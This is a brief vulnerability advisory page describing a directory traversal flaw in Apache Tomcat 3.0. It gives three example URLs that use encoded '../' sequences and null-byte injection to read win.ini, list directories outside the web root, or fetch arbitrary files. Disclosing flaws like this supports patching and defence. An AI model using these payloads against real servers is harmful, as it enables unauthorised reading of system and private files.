|
Apache Tomcat 3.0 Directory Traversal Vulnerability
The following examples have been provided by lovehacker <lovehacker@263.net>: http://www.example.com/../../winnt/win.ini%00examples/jsp/hello.jsp Will cause the Tomcat server to send back the content of win.ini. http://www.example.com/%2e%2e/%2e%2e/%00.jsp will disclose a directory listing from outside Tomcat's normal directory tree. http://www.example.com/%2e%2e/%2e%2e%5cfilename%00.jsp will reveal the requested file [filename]. |
|
Privacy Statement |